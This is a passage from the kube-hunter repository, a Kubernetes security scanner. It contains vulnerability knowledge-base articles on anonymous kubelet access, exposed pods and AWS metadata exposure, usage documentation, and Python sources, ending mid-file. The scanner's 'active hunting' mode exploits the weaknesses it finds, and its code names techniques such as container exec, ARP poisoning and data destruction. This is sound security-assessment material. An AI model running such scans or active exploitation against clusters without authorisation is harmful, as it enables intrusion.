2 | vid: KHV051
3 | title: Exposed Existing Privileged Containers Via Secure Kubelet Port
4 | categories: [Access Risk]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
13 |
14 | A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
15 |
16 | Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host.
17 |
18 | ## Remediation
19 |
20 | Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
21 |
22 | Minimize the use of privileged containers.
23 |
24 | Use Pod Security Policies to enforce using `privileged: false` policy.
25 |
26 | Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.
27 |
28 | Ensure node(s) runs active filesystem monitoring.
29 |
30 | Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
31 |
32 | Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.
33 |
34 | ## References
35 |
36 | - [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
37 | - [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
38 | - [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
39 | - [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
40 | - [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
41 | - [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
42 |
--------------------------------------------------------------------------------
/docs/_kb/KHV052.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV052
3 | title: Exposed Pods
4 | categories: [Information Disclosure]
5 | severity: medium
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | An attacker could view sensitive information about pods that are bound to a Node using the exposed /pods endpoint
13 | This can be done either by accessing the readonly port (default 10255), or from the secure kubelet port (10250)
14 |
15 | ## Remediation
16 |
17 | Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
18 |
19 | Disable the readonly port by using `--read-only-port=0` kubelet flag.
20 |
21 | ## References
22 |
23 | - [Kubelet configuration](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/)
24 | - [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
--------------------------------------------------------------------------------
/docs/_kb/KHV053.md:
--------------------------------------------------------------------------------
1 | ---
2 | vid: KHV053
3 | title: AWS Metadata Exposure
4 | categories: [Information Disclosure]
5 | severity: high
6 | ---
7 |
8 | # {{ page.vid }} - {{ page.title }}
9 |
10 | ## Issue description
11 |
12 | AWS EC2 provides an internal HTTP endpoint that exposes information from the cloud platform to workloads running in an instance. The endpoint is accessible to every workload running in the instance. An attacker that is able to execute a pod in the cluster may be able to query the metadata service and discover additional information about the environment.
13 |
14 | ## Remediation
15 |
16 | * Limit access to the instance metadata service. Consider using a local firewall such as `iptables` to disable access from some or all processes/users to the instance metadata service.
17 |
18 | * Disable the metadata service (via instance metadata options or IAM), or at a minimum enforce the use IMDSv2 on an instance to require token-based access to the service.
19 |
20 | * Modify the HTTP PUT response hop limit on the instance to 1. This will only allow access to the service from the instance itself rather than from within a pod.
21 |
22 | ## References
23 |
24 | - [AWS Instance Metadata service](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html)
25 | - [EC2 Instance Profiles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html)
--------------------------------------------------------------------------------
/docs/_layouts/default.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | {% seo %}
9 |
10 |
13 |
14 |
15 |
16 |
17 |
24 |
25 | {{ site.description | default: site.github.project_tagline }}
26 |
27 | {% if site.github.is_project_page %}
28 | View the Project on GitHub {{ site.github.repository_nwo }}
29 | {% endif %}
30 |
31 | {% if site.github.is_user_page %}
32 | View My GitHub Profile
33 | {% endif %}
34 |
35 | {% if site.show_downloads %}
36 |
41 | {% endif %}
42 |
43 |
44 |
45 |
46 | Lookup Vulnerability
47 |
48 | Find
49 |
50 |
53 |
54 |
55 |
56 |
57 | {{ content }}
58 |
59 |
60 |
66 |
67 |
68 |
91 | {% if site.google_analytics %}
92 |
100 | {% endif %}
101 |
102 |
--------------------------------------------------------------------------------
/docs/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | ---
3 | # Welcome to kube-hunter documentation
4 |
5 | ## Documentation for vulnerabilities
6 |
7 | For information about a specific vulnerability reported by kube-hunter, enter its 'VID' (e.g. KHV004) in the search box to the left, to get to the vulnerability article.
8 |
9 | For a complete list of all documented vulnerabilities, [click here]({{ site.baseurl }}{% link kbindex.html %})
10 |
11 | ## Getting started
12 |
13 | ### Where should I run kube-hunter?
14 | Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This will give you an attackers-eye-view of your Kubernetes setup.
15 |
16 | You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.
17 |
18 | You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).
19 |
20 | ### Scanning options
21 |
22 | By default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options:
23 |
24 | 1. **Remote scanning**
25 | To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
26 | `./kube-hunter.py --remote some.node.com`
27 |
28 | 2. **interface scanning**
29 | To specify interface scanning, you can use the `--interface` option. (this will scan all of the machine's network interfaces) Example:
30 | `./kube-hunter.py --interface`
31 |
32 | 3. **Network scanning**
33 | To specify a specific CIDR to scan, use the `--cidr` option. Example:
34 | `./kube-hunter.py --cidr 192.168.0.0/24`
35 |
36 | ### Active Hunting
37 |
38 | Active hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities.
39 | The main difference between normal and active hunting is that a normal hunt will never change state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.
40 |
41 | By default, kube-hunter does not do active hunting. To active hunt a cluster, use the `--active` flag. Example:
42 | `./kube-hunter.py --remote some.domain.com --active`
43 |
44 | ### List of tests
45 | You can see the list of tests with the `--list` option: Example:
46 | `./kube-hunter.py --list`
47 |
48 | To see active hunting tests as well as passive:
49 | `./kube-hunter.py --list --active`
50 |
51 | ### Nodes Mapping
52 | To see only a mapping of your nodes network, run with `--mapping` option. Example:
53 | `./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
54 | This will output all the Kubernetes nodes kube-hunter has found.
55 |
56 | ### Output
57 | To control logging, you can specify a log level, using the `--log` option. Example:
58 | `./kube-hunter.py --active --log WARNING`
59 | Available log levels are:
60 |
61 | * DEBUG
62 | * INFO (default)
63 | * WARNING
64 |
65 | ### Dispatching
66 | By default, the report will be dispatched to `stdout`, but you can specify different methods, by using the `--dispatch` option. Example:
67 | `./kube-hunter.py --report json --dispatch http`
68 | Available dispatch methods are:
69 |
70 | * stdout (default)
71 | * http (to configure, set the following environment variables:)
72 | * KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
73 | * KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
74 |
75 | ## Deployment
76 | There are three methods for deploying kube-hunter:
77 |
78 | ### On Machine
79 |
80 | You can run the kube-hunter python code directly on your machine.
81 | #### Prerequisites
82 |
83 | You will need the following installed:
84 | * python 3.x
85 | * pip
86 |
87 | Clone the repository:
88 | ~~~
89 | git clone https://github.com/aquasecurity/kube-hunter.git
90 | ~~~
91 |
92 | Install module dependencies:
93 | ~~~
94 | cd ./kube-hunter
95 | pip install -r requirements.txt
96 | ~~~
97 |
98 | Run:
99 | `./kube-hunter.py`
100 |
101 | _If you want to use pyinstaller/py2exe you need to first run the install_imports.py script._
102 | ### Container
103 | Aqua Security maintains a containerised version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading reports data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
104 |
105 | The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.
106 |
107 | If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:
108 |
109 | `docker run -it --rm --network host aquasec/kube-hunter`
110 |
111 | _Note for Docker for Mac/Windows:_ Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying `--network host` allows kube-hunter access to the network interfaces of that VM, rather than those of your machine.
112 | By default kube-hunter runs in interactive mode. You can also specify the scanning option with the parameters described above e.g.
113 |
114 | `docker run --rm aquasec/kube-hunter --cidr 192.168.0.0/24`
115 |
116 | ### Pod
117 | This option lets you discover what running a malicious container can do/discover on your cluster. This gives a perspective on what an attacker could do if they were able to compromise a pod, perhaps through a software vulnerability. This may reveal significantly more vulnerabilities.
118 |
119 | The `job.yaml` file defines a Job that will run kube-hunter in a pod, using default Kubernetes pod access settings.
120 | * Run the job with `kubectl create` with that yaml file.
121 | * Find the pod name with `kubectl describe job kube-hunter`
122 | * View the test results with `kubectl logs `
123 |
--------------------------------------------------------------------------------
/docs/kbindex.html:
--------------------------------------------------------------------------------
1 | ---
2 | ---
3 |
4 | All articles
5 |
6 | {% for article in site.kb %}
7 |
8 |
11 |
12 | {% endfor %}
13 |
--------------------------------------------------------------------------------
/job.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | apiVersion: batch/v1
3 | kind: Job
4 | metadata:
5 | name: kube-hunter
6 | spec:
7 | template:
8 | metadata:
9 | labels:
10 | app: kube-hunter
11 | spec:
12 | containers:
13 | - name: kube-hunter
14 | image: aquasec/kube-hunter:0.6.8
15 | command: ["kube-hunter"]
16 | args: ["--pod"]
17 | restartPolicy: Never
18 |
--------------------------------------------------------------------------------
/kube-hunter-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/kube-hunter-screenshot.png
--------------------------------------------------------------------------------
/kube-hunter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/kube-hunter.png
--------------------------------------------------------------------------------
/kube-hunter.py:
--------------------------------------------------------------------------------
1 | kube_hunter/__main__.py
--------------------------------------------------------------------------------
/kube_hunter/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/kube_hunter/__init__.py
--------------------------------------------------------------------------------
/kube_hunter/__main__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # flake8: noqa: E402
3 |
4 | from functools import partial
5 | import logging
6 | import threading
7 |
8 | from kube_hunter.conf import Config, set_config
9 | from kube_hunter.conf.parser import parse_args
10 | from kube_hunter.conf.logging import setup_logger
11 |
12 | from kube_hunter.plugins import initialize_plugin_manager
13 |
14 | pm = initialize_plugin_manager()
15 | # Using a plugin hook for adding arguments before parsing
16 | args = parse_args(add_args_hook=pm.hook.parser_add_arguments)
17 | config = Config(
18 | active=args.active,
19 | cidr=args.cidr,
20 | include_patched_versions=args.include_patched_versions,
21 | interface=args.interface,
22 | log_file=args.log_file,
23 | mapping=args.mapping,
24 | network_timeout=args.network_timeout,
25 | num_worker_threads=args.num_worker_threads,
26 | pod=args.pod,
27 | quick=args.quick,
28 | remote=args.remote,
29 | statistics=args.statistics,
30 | k8s_auto_discover_nodes=args.k8s_auto_discover_nodes,
31 | service_account_token=args.service_account_token,
32 | kubeconfig=args.kubeconfig,
33 | enable_cve_hunting=args.enable_cve_hunting,
34 | custom=args.custom,
35 | )
36 | setup_logger(args.log, args.log_file)
37 | set_config(config)
38 |
39 | # Running all other registered plugins before execution
40 | pm.hook.load_plugin(args=args)
41 |
42 | from kube_hunter.core.events.event_handler import handler
43 | from kube_hunter.core.events.types import HuntFinished, HuntStarted
44 | from kube_hunter.modules.discovery.hosts import RunningAsPodEvent, HostScanEvent
45 | from kube_hunter.modules.report import get_reporter, get_dispatcher
46 |
47 | logger = logging.getLogger(__name__)
48 | config.dispatcher = get_dispatcher(args.dispatch)
49 | config.reporter = get_reporter(args.report)
50 |
51 |
52 | def interactive_set_config():
53 | """Sets config manually, returns True for success"""
54 | options = [
55 | ("Remote scanning", "scans one or more specific IPs or DNS names"),
56 | ("Interface scanning", "scans subnets on all local network interfaces"),
57 | ("IP range scanning", "scans a given IP range"),
58 | ]
59 |
60 | print("Choose one of the options below:")
61 | for i, (option, explanation) in enumerate(options):
62 | print("{}. {} ({})".format(i + 1, option.ljust(20), explanation))
63 | choice = input("Your choice: ")
64 | if choice == "1":
65 | config.remote = input("Remotes (separated by a ','): ").replace(" ", "").split(",")
66 | elif choice == "2":
67 | config.interface = True
68 | elif choice == "3":
69 | config.cidr = (
70 | input("CIDR separated by a ',' (example - 192.168.0.0/16,!192.168.0.8/32,!192.168.1.0/24): ")
71 | .replace(" ", "")
72 | .split(",")
73 | )
74 | else:
75 | return False
76 | return True
77 |
78 |
79 | def list_hunters(class_names=False):
80 | print("\nPassive Hunters:\n----------------")
81 | for hunter, docs in handler.passive_hunters.items():
82 | name, doc = hunter.parse_docs(docs)
83 | if class_names:
84 | name = hunter.__name__
85 | print(f"* {name}\n {doc}\n")
86 |
87 | if config.active:
88 | print("\n\nActive Hunters:\n---------------")
89 | for hunter, docs in handler.active_hunters.items():
90 | name, doc = hunter.parse_docs(docs)
91 | if class_names:
92 | name = hunter.__name__
93 | print(f"* {name}\n {doc}\n")
94 |
95 |
96 | hunt_started_lock = threading.Lock()
97 | hunt_started = False
98 |
99 |
100 | def main():
101 | global hunt_started
102 | scan_options = [config.pod, config.cidr, config.remote, config.interface, config.k8s_auto_discover_nodes]
103 | try:
104 | if args.list:
105 | if args.raw_hunter_names:
106 | list_hunters(class_names=True)
107 | else:
108 | list_hunters()
109 | return
110 |
111 | if not any(scan_options):
112 | if not interactive_set_config():
113 | return
114 |
115 | with hunt_started_lock:
116 | hunt_started = True
117 | handler.publish_event(HuntStarted())
118 | if config.pod:
119 | handler.publish_event(RunningAsPodEvent())
120 | else:
121 | handler.publish_event(HostScanEvent())
122 |
123 | # Blocking to see discovery output
124 | handler.join()
125 | except KeyboardInterrupt:
126 | logger.debug("Kube-Hunter stopped by user")
127 | # happens when running a container without interactive option
128 | except EOFError:
129 | logger.error("\033[0;31mPlease run again with -it\033[0m")
130 | finally:
131 | hunt_started_lock.acquire()
132 | if hunt_started:
133 | hunt_started_lock.release()
134 | handler.publish_event(HuntFinished())
135 | handler.join()
136 | handler.free()
137 | logger.debug("Cleaned Queue")
138 | else:
139 | hunt_started_lock.release()
140 |
141 |
142 | if __name__ == "__main__":
143 | main()
144 |
--------------------------------------------------------------------------------
/kube_hunter/conf/__init__.py:
--------------------------------------------------------------------------------
1 | from dataclasses import dataclass, field
2 | from typing import Any, Optional
3 |
4 |
5 | def get_default_core_hunters():
6 | return ["FromPodHostDiscovery", "HostDiscovery", "PortDiscovery", "SendFullReport", "Collector", "StartedInfo"]
7 |
8 |
9 | @dataclass
10 | class Config:
11 | """Config is a configuration container.
12 | It contains the following fields:
13 | - active: Enable active hunters
14 | - cidr: Network subnets to scan
15 | - dispatcher: Dispatcher object
16 | - include_patched_version: Include patches in version comparison
17 | - interface: Interface scanning mode
18 | - list_hunters: Print a list of existing hunters
19 | - log_level: Log level
20 | - log_file: Log File path
21 | - mapping: Report only found components
22 | - network_timeout: Timeout for network operations
23 | - num_worker_threads: Add a flag --threads to change the default 800 thread count of the event handler
24 | - pod: From pod scanning mode
25 | - quick: Quick scanning mode
26 | - remote: Hosts to scan
27 | - report: Output format
28 | - statistics: Include hunters statistics
29 | - enable_cve_hunting: enables cve hunting, shows cve results
30 | """
31 |
32 | active: bool = False
33 | cidr: Optional[str] = None
34 | dispatcher: Optional[Any] = None
35 | include_patched_versions: bool = False
36 | interface: bool = False
37 | log_file: Optional[str] = None
38 | mapping: bool = False
39 | network_timeout: float = 5.0
40 | num_worker_threads: int = 800
41 | pod: bool = False
42 | quick: bool = False
43 | remote: Optional[str] = None
44 | reporter: Optional[Any] = None
45 | statistics: bool = False
46 | k8s_auto_discover_nodes: bool = False
47 | service_account_token: Optional[str] = None
48 | kubeconfig: Optional[str] = None
49 | enable_cve_hunting: bool = False
50 | custom: Optional[list] = None
51 | raw_hunter_names: bool = False
52 | core_hunters: list = field(default_factory=get_default_core_hunters)
53 |
54 |
55 | _config: Optional[Config] = None
56 |
57 |
58 | def get_config() -> Config:
59 | if not _config:
60 | raise ValueError("Configuration is not initialized")
61 | return _config
62 |
63 |
64 | def set_config(new_config: Config) -> None:
65 | global _config
66 | _config = new_config
67 |
--------------------------------------------------------------------------------
/kube_hunter/conf/logging.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | DEFAULT_LEVEL = logging.INFO
4 | DEFAULT_LEVEL_NAME = logging.getLevelName(DEFAULT_LEVEL)
5 | LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s %(message)s"
6 |
7 |
8 | def setup_logger(level_name, logfile):
9 | # Remove any existing handlers
10 | # Unnecessary in Python 3.8 since `logging.basicConfig` has `force` parameter
11 | for h in logging.getLogger().handlers[:]:
12 | h.close()
13 | logging.getLogger().removeHandler(h)
14 |
15 | if level_name.upper() == "NONE":
16 | logging.disable(logging.CRITICAL)
17 | else:
18 | log_level = getattr(logging, level_name.upper(), None)
19 | log_level = log_level if isinstance(log_level, int) else None
20 | if logfile is None:
21 | logging.basicConfig(level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
22 | else:
23 | logging.basicConfig(filename=logfile, level=log_level or DEFAULT_LEVEL, format=LOG_FORMAT)
24 | if not log_level:
25 | logging.warning(f"Unknown log level '{level_name}', using {DEFAULT_LEVEL_NAME}")
26 |
--------------------------------------------------------------------------------
/kube_hunter/conf/parser.py:
--------------------------------------------------------------------------------
1 | from argparse import ArgumentParser
2 | from kube_hunter.plugins import hookimpl
3 |
4 |
5 | @hookimpl
6 | def parser_add_arguments(parser):
7 | """
8 | This is the default hook implementation for parse_add_argument
9 | Contains initialization for all default arguments
10 | """
11 | parser.add_argument(
12 | "--list",
13 | action="store_true",
14 | help="Displays all tests in kubehunter (add --active flag to see active tests)",
15 | )
16 |
17 | parser.add_argument("--interface", action="store_true", help="Set hunting on all network interfaces")
18 |
19 | parser.add_argument("--pod", action="store_true", help="Set hunter as an insider pod")
20 |
21 | parser.add_argument("--quick", action="store_true", help="Prefer quick scan (subnet 24)")
22 |
23 | parser.add_argument(
24 | "--include-patched-versions",
25 | action="store_true",
26 | help="Don't skip patched versions when scanning",
27 | )
28 |
29 | parser.add_argument(
30 | "--cidr",
31 | type=str,
32 | help="Set an IP range to scan/ignore, example: '192.168.0.0/24,!192.168.0.8/32,!192.168.0.16/32'",
33 | )
34 |
35 | parser.add_argument(
36 | "--mapping",
37 | action="store_true",
38 | help="Outputs only a mapping of the cluster's nodes",
39 | )
40 |
41 | parser.add_argument(
42 | "--remote",
43 | nargs="+",
44 | metavar="HOST",
45 | default=list(),
46 | help="One or more remote ip/dns to hunt",
47 | )
48 |
49 | parser.add_argument(
50 | "-c",
51 | "--custom",
52 | nargs="+",
53 | metavar="HUNTERS",
54 | default=list(),
55 | help="Custom hunting. Only given hunter names will register in the hunt."
56 | "for a list of options run `--list --raw-hunter-names`",
57 | )
58 |
59 | parser.add_argument(
60 | "--raw-hunter-names",
61 | action="store_true",
62 | help="Use in combination with `--list` to display hunter class names to pass for custom hunting flag",
63 | )
64 |
65 | parser.add_argument(
66 | "--k8s-auto-discover-nodes",
67 | action="store_true",
68 | help="Enables automatic detection of all nodes in a Kubernetes cluster "
69 | "by quering the Kubernetes API server. "
70 | "It supports both in-cluster config (when running as a pod), "
71 | "and a specific kubectl config file (use --kubeconfig to set this). "
72 | "By default, when this flag is set, it will use in-cluster config. "
73 | "NOTE: this is automatically switched on in --pod mode.",
74 | )
75 |
76 | parser.add_argument(
77 | "--service-account-token",
78 | type=str,
79 | metavar="JWT_TOKEN",
80 | help="Manually specify the service account jwt token to use for authenticating in the hunting process "
81 | "NOTE: This overrides the loading of the pod's bounded authentication when running in --pod mode",
82 | )
83 |
84 | parser.add_argument(
85 | "--kubeconfig",
86 | type=str,
87 | metavar="KUBECONFIG",
88 | default=None,
89 | help="Specify the kubeconfig file to use for Kubernetes nodes auto discovery "
90 | " (to be used in conjuction with the --k8s-auto-discover-nodes flag.",
91 | )
92 |
93 | parser.add_argument("--active", action="store_true", help="Enables active hunting")
94 |
95 | parser.add_argument(
96 | "--enable-cve-hunting",
97 | action="store_true",
98 | help="Show cluster CVEs based on discovered version (Depending on different vendors, may result in False Positives)",
99 | )
100 |
101 | parser.add_argument(
102 | "--log",
103 | type=str,
104 | metavar="LOGLEVEL",
105 | default="INFO",
106 | help="Set log level, options are: debug, info, warn, none",
107 | )
108 |
109 | parser.add_argument(
110 | "--log-file",
111 | type=str,
112 | default=None,
113 | help="Path to a log file to output all logs to",
114 | )
115 |
116 | parser.add_argument(
117 | "--report",
118 | type=str,
119 | default="plain",
120 | help="Set report type, options are: plain, yaml, json",
121 | )
122 |
123 | parser.add_argument(
124 | "--dispatch",
125 | type=str,
126 | default="stdout",
127 | help="Where to send the report to, options are: "
128 | "stdout, http (set KUBEHUNTER_HTTP_DISPATCH_URL and "
129 | "KUBEHUNTER_HTTP_DISPATCH_METHOD environment variables to configure)",
130 | )
131 |
132 | parser.add_argument("--statistics", action="store_true", help="Show hunting statistics")
133 |
134 | parser.add_argument("--network-timeout", type=float, default=5.0, help="network operations timeout")
135 |
136 | parser.add_argument(
137 | "--num-worker-threads",
138 | type=int,
139 | default=800,
140 | help="In some environments the default thread count (800) can cause the process to crash. "
141 | "In the case of a crash try lowering the thread count",
142 | )
143 |
144 |
145 | def parse_args(add_args_hook):
146 | """
147 | Function handles all argument parsing
148 |
149 | @param add_arguments: hook for adding arguments to it's given ArgumentParser parameter
150 | @return: parsed arguments dict
151 | """
152 | parser = ArgumentParser(description="kube-hunter - hunt for security weaknesses in Kubernetes clusters")
153 | # adding all arguments to the parser
154 | add_args_hook(parser=parser)
155 |
156 | args = parser.parse_args()
157 | if args.cidr:
158 | args.cidr = args.cidr.replace(" ", "").split(",")
159 | return args
160 |
--------------------------------------------------------------------------------
/kube_hunter/core/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import types
3 | from . import events
4 |
--------------------------------------------------------------------------------
/kube_hunter/core/events/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import types
3 |
--------------------------------------------------------------------------------
/kube_hunter/core/events/types.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import threading
3 | import requests
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.types import KubernetesCluster
7 | from kube_hunter.core.types.vulnerabilities import (
8 | GeneralSensitiveInformationTechnique,
9 | ExposedSensitiveInterfacesTechnique,
10 | MountServicePrincipalTechnique,
11 | ListK8sSecretsTechnique,
12 | AccessContainerServiceAccountTechnique,
13 | AccessK8sApiServerTechnique,
14 | AccessKubeletAPITechnique,
15 | AccessK8sDashboardTechnique,
16 | InstanceMetadataApiTechnique,
17 | ExecIntoContainerTechnique,
18 | SidecarInjectionTechnique,
19 | NewContainerTechnique,
20 | GeneralPersistenceTechnique,
21 | HostPathMountPrivilegeEscalationTechnique,
22 | PrivilegedContainerTechnique,
23 | ClusterAdminBindingTechnique,
24 | ARPPoisoningTechnique,
25 | CoreDNSPoisoningTechnique,
26 | DataDestructionTechnique,
27 | GeneralDefenseEvasionTechnique,
28 | ConnectFromProxyServerTechnique,
29 | CVERemoteCodeExecutionCategory,
30 | CVEPrivilegeEscalationCategory,
31 | CVEDenialOfServiceTechnique,
32 | )
33 |
34 | logger = logging.getLogger(__name__)
35 |
36 |
37 | class EventFilterBase:
38 | def __init__(self, event):
39 | self.event = event
40 |
41 | # Returns self.event as default.
42 | # If changes has been made, should return the new event that's been altered
43 | # Return None to indicate the event should be discarded
44 | def execute(self):
45 | return self.event
46 |
47 |
48 | class Event:
49 | def __init__(self):
50 | self.previous = None
51 | self.hunter = None
52 |
53 | # newest attribute gets selected first
54 | def __getattr__(self, name):
55 | if name == "previous":
56 | return None
57 | for event in self.history:
58 | if name in event.__dict__:
59 | return event.__dict__[name]
60 |
61 | # Event's logical location to be used mainly for reports.
62 | # If event don't implement it check previous event
63 | # This is because events are composed (previous -> previous ...)
64 | # and not inherited
65 | def location(self):
66 | location = None
67 | if self.previous:
68 | location = self.previous.location()
69 |
70 | return location
71 |
72 | # returns the event history ordered from newest to oldest
73 | @property
74 | def history(self):
75 | previous, history = self.previous, list()
76 | while previous:
77 | history.append(previous)
78 | previous = previous.previous
79 | return history
80 |
81 |
82 | class MultipleEventsContainer(Event):
83 | """
84 | This is the class of the object an hunter will get if he was registered to multiple events.
85 | """
86 |
87 | def __init__(self, events):
88 | self.events = events
89 |
90 | def get_by_class(self, event_class):
91 | for event in self.events:
92 | if event.__class__ == event_class:
93 | return event
94 |
95 |
96 | class Service:
97 | def __init__(self, name, path="", secure=True):
98 | self.name = name
99 | self.secure = secure
100 | self.path = path
101 | self.role = "Node"
102 |
103 | # if a service account token was specified, we load it to the Service class
104 | # We load it here because generally all kuberentes services could be authenticated with the token
105 | config = get_config()
106 | if config.service_account_token:
107 | self.auth_token = config.service_account_token
108 |
109 | def get_name(self):
110 | return self.name
111 |
112 | def get_path(self):
113 | return "/" + self.path if self.path else ""
114 |
115 | def explain(self):
116 | return self.__doc__
117 |
118 |
119 | class Vulnerability:
120 | severity = dict(
121 | {
122 | GeneralSensitiveInformationTechnique: "low",
123 | ExposedSensitiveInterfacesTechnique: "high",
124 | MountServicePrincipalTechnique: "high",
125 | ListK8sSecretsTechnique: "high",
126 | AccessContainerServiceAccountTechnique: "low",
127 | AccessK8sApiServerTechnique: "medium",
128 | AccessKubeletAPITechnique: "medium",
129 | AccessK8sDashboardTechnique: "medium",
130 | InstanceMetadataApiTechnique: "high",
131 | ExecIntoContainerTechnique: "high",
132 | SidecarInjectionTechnique: "high",
133 | NewContainerTechnique: "high",
134 | GeneralPersistenceTechnique: "high",
135 | HostPathMountPrivilegeEscalationTechnique: "high",
136 | PrivilegedContainerTechnique: "high",
137 | ClusterAdminBindingTechnique: "high",
138 | ARPPoisoningTechnique: "medium",
139 | CoreDNSPoisoningTechnique: "high",
140 | DataDestructionTechnique: "high",
141 | GeneralDefenseEvasionTechnique: "high",
142 | ConnectFromProxyServerTechnique: "low",
143 | CVERemoteCodeExecutionCategory: "high",
144 | CVEPrivilegeEscalationCategory: "high",
145 | CVEDenialOfServiceTechnique: "medium",
146 | }
147 | )
148 |
149 | # TODO: make vid mandatory once migration is done
150 | def __init__(self, component, name, category=None, vid="None"):
151 | self.vid = vid
152 | self.component = component
153 | self.category = category
154 | self.name = name
155 | self.evidence = ""
156 | self.role = "Node"
157 |
158 | def get_vid(self):
159 | return self.vid
160 |
161 | def get_category(self):
162 | if self.category:
163 | return self.category.name
164 |
165 | def get_name(self):
166 | return self.name
167 |
168 | def explain(self):
169 | return self.__doc__
170 |
171 | def get_severity(self):
172 | return self.severity.get(self.category, "low")
173 |
174 |
175 | event_id_count_lock = threading.Lock()
176 | event_id_count = 0
177 |
178 |
179 | class NewHostEvent(Event):
180 | def __init__(self, host, cloud=None):
181 | global event_id_count
182 | self.host = host
183 | self.cloud_type = cloud
184 |
185 | with event_id_count_lock:
186 | self.event_id = event_id_count
187 | event_id_count += 1
188 |
189 | @property
190 | def cloud(self):
191 | if not self.cloud_type:
192 | self.cloud_type = self.get_cloud()
193 | return self.cloud_type
194 |
195 | def get_cloud(self):
196 | config = get_config()
197 | try:
198 | logger.debug("Checking whether the cluster is deployed on azure's cloud")
199 | # Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
200 | result = requests.get(
201 | f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
202 | timeout=config.network_timeout,
203 | ).json()
204 | return result["cloud"] or "NoCloud"
205 | except requests.ConnectionError:
206 | logger.info("Failed to connect cloud type service", exc_info=True)
207 | except Exception:
208 | logger.warning(f"Unable to check cloud of {self.host}", exc_info=True)
209 | return "NoCloud"
210 |
211 | def __str__(self):
212 | return str(self.host)
213 |
214 | # Event's logical location to be used mainly for reports.
215 | def location(self):
216 | return str(self.host)
217 |
218 |
219 | class OpenPortEvent(Event):
220 | def __init__(self, port):
221 | self.port = port
222 |
223 | def __str__(self):
224 | return str(self.port)
225 |
226 | # Event's logical location to be used mainly for reports.
227 | def location(self):
228 | if self.host:
